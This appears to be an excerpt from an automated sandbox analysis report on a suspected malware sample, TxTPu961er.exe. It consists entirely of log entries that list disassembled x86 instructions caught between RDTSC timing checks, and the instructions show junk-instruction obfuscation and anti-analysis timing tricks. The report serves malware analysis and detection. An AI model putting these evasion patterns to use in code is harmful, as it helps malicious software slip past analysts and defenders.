Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A1059D second address: 4A105C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7905119FC0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A105C3 second address: 4A105D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49F0021 second address: 49F0113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, 339CC245h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov al, F4h 0x00000010 mov edi, 4DD21F3Eh 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F7905119FC4h 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F7905119FC0h 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F7905119FBCh 0x0000002c and si, C368h 0x00000031 jmp 00007F7905119FBBh 0x00000036 popfd 0x00000037 mov si, 455Fh 0x0000003b popad 0x0000003c jmp 00007F7905119FC4h 0x00000041 popad 0x00000042 mov eax, dword ptr [ebp+08h] 0x00000045 jmp 00007F7905119FC0h 0x0000004a and dword ptr [eax], 00000000h 0x0000004d pushad 0x0000004e pushfd 0x0000004f jmp 00007F7905119FBEh 0x00000054 sbb ax, 1828h 0x00000059 jmp 00007F7905119FBBh 0x0000005e popfd 0x0000005f pushfd 0x00000060 jmp 00007F7905119FC8h 0x00000065 jmp 00007F7905119FC5h 0x0000006a popfd 0x0000006b popad 0x0000006c and dword ptr [eax+04h], 00000000h 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F7905119FBDh 0x00000077 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49D0490 second address: 49D0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0E48 second address: 49E0E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0E4C second address: 49E0E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E0E50 second address: 49E0E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00D92 second address: 4A00DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F790500650Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00DA2 second address: 4A00DB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00DB2 second address: 4A00DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00DB6 second address: 4A00DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00DCE second address: 4A00DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00DD4 second address: 4A00DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00DD8 second address: 4A00DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00DE7 second address: 4A00E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], ecx 0x00000009 pushad 0x0000000a call 00007F7905119FC5h 0x0000000f mov ebx, eax 0x00000011 pop eax 0x00000012 mov edx, 5BDE98F0h 0x00000017 popad 0x00000018 mov eax, dword ptr [76FA65FCh] 0x0000001d jmp 00007F7905119FBFh 0x00000022 test eax, eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00E2A second address: 4A00E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7905006511h 0x0000000a adc esi, 2F154926h 0x00000010 jmp 00007F7905006511h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00E59 second address: 4A00E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7905119FC3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F797763CAAAh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7905119FC5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A00E8F second address: 4A00EA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ch, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F790500650Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A1003E second address: 4A10081 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edi, eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F7905119FBAh 0x00000012 mov eax, 4D57D141h 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007F7905119FBEh 0x0000001e sbb al, 00000058h 0x00000021 jmp 00007F7905119FBBh 0x00000026 popfd 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A10081 second address: 4A100AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7905006511h 0x0000000a and si, 06F6h 0x0000000f jmp 00007F7905006511h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A100AF second address: 4A100E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7905119FC8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A100E1 second address: 4A100E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A100E5 second address: 4A100EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0008 second address: 49C000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C000C second address: 49C0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0010 second address: 49C0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0016 second address: 49C00BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7905119FC4h 0x00000011 xor al, FFFFFFB8h 0x00000014 jmp 00007F7905119FBBh 0x00000019 popfd 0x0000001a movzx eax, di 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F7905119FC2h 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F7905119FC0h 0x0000002a mov ebp, esp 0x0000002c jmp 00007F7905119FC0h 0x00000031 and esp, FFFFFFF8h 0x00000034 pushad 0x00000035 mov bx, 2B90h 0x00000039 popad 0x0000003a push ecx 0x0000003b pushad 0x0000003c mov edi, ecx 0x0000003e mov edi, esi 0x00000040 popad 0x00000041 mov dword ptr [esp], ecx 0x00000044 jmp 00007F7905119FC8h 0x00000049 xchg eax, ebx 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d mov edi, eax 0x0000004f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C00BE second address: 49C0152 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F7905006515h 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F7905006511h 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F790500650Eh 0x00000019 mov ebx, dword ptr [ebp+10h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F790500650Eh 0x00000023 and ecx, 4C7CAEF8h 0x00000029 jmp 00007F790500650Bh 0x0000002e popfd 0x0000002f jmp 00007F7905006518h 0x00000034 popad 0x00000035 xchg eax, esi 0x00000036 jmp 00007F7905006510h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0152 second address: 49C0156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0156 second address: 49C015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C015A second address: 49C0160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0160 second address: 49C0186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dh, DCh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7905006519h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0186 second address: 49C018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C018D second address: 49C020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov bx, ED48h 0x0000000f jmp 00007F7905006511h 0x00000014 popad 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F790500650Ch 0x0000001d add ax, AFA8h 0x00000022 jmp 00007F790500650Bh 0x00000027 popfd 0x00000028 jmp 00007F7905006518h 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F790500650Bh 0x00000034 xchg eax, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F7905006515h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C020B second address: 49C021B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905119FBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C021B second address: 49C0242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7905006519h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0242 second address: 49C0248 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0248 second address: 49C027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F790500650Ah 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F79775648C2h 0x00000012 pushad 0x00000013 mov si, B735h 0x00000017 popad 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F790500650Ah 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C027A second address: 49C027E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C027E second address: 49C0284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0284 second address: 49C02CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7977678355h 0x0000000e jmp 00007F7905119FBFh 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 pushad 0x00000017 call 00007F7905119FBBh 0x0000001c pushad 0x0000001d popad 0x0000001e pop esi 0x0000001f popad 0x00000020 or edx, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007F7905119FBEh 0x0000002b pop ecx 0x0000002c mov dx, C406h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C02CE second address: 49C0320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F790500650Eh 0x00000016 and ecx, 318782A8h 0x0000001c jmp 00007F790500650Bh 0x00000021 popfd 0x00000022 movzx eax, di 0x00000025 popad 0x00000026 jne 00007F7977564884h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F790500650Eh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0320 second address: 49C0347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7905119FC0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0347 second address: 49C034B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C034B second address: 49C0351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0351 second address: 49C0357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0357 second address: 49C035B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C035B second address: 49C036E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F7977564844h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov edx, esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C036E second address: 49C039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7905119FC3h 0x00000009 popad 0x0000000a test bl, 00000007h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7905119FC0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C039D second address: 49C03A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C03A1 second address: 49C03A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B06E2 second address: 49B06E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B06E6 second address: 49B06EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B06EC second address: 49B0702 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0702 second address: 49B0762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov ecx, 042C5677h 0x0000000f mov di, si 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F7905119FC9h 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F7905119FBEh 0x00000020 mov ebp, esp 0x00000022 jmp 00007F7905119FC0h 0x00000027 and esp, FFFFFFF8h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov al, dh 0x0000002f mov bx, ax 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0762 second address: 49B0774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F790500650Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0774 second address: 49B07AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F7905119FC6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7905119FBEh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B07AD second address: 49B0802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 pushfd 0x00000006 jmp 00007F790500650Ah 0x0000000b or ax, EF18h 0x00000010 jmp 00007F790500650Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F7905006516h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7905006517h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0802 second address: 49B0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0808 second address: 49B080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B080C second address: 49B084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f pushfd 0x00000010 jmp 00007F7905119FBFh 0x00000015 add ax, 869Eh 0x0000001a jmp 00007F7905119FC9h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B084B second address: 49B088E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006511h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F790500650Eh 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 movzx eax, dx 0x00000016 mov esi, edx 0x00000018 popad 0x00000019 mov ebx, 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F790500650Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B088E second address: 49B0892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0892 second address: 49B0898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0898 second address: 49B08BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7905119FBAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B08BA second address: 49B08C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F790500650Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B08C9 second address: 49B08FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F797767FA5Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7905119FBDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0A0E second address: 49B0A43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905006519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7905006513h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0A43 second address: 49B0A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0A47 second address: 49B0A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0A4D second address: 49B0A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905119FBBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0A5C second address: 49B0A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0A60 second address: 49B0AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F7905119FC5h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F7905119FC3h 0x00000018 jmp 00007F7905119FC3h 0x0000001d popfd 0x0000001e call 00007F7905119FC8h 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0AC4 second address: 49B0ADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905006517h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0B96 second address: 49B0C0E instructions: 0x00000000 rdtsc 0x00000002 call 00007F7905119FBAh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop ebx 0x0000000c jmp 00007F7905119FC1h 0x00000011 mov esp, ebp 0x00000013 pushad 0x00000014 mov ebx, ecx 0x00000016 mov esi, 625E527Fh 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F7905119FC7h 0x00000025 pushfd 0x00000026 jmp 00007F7905119FC8h 0x0000002b jmp 00007F7905119FC5h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49B0C0E second address: 49B0C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
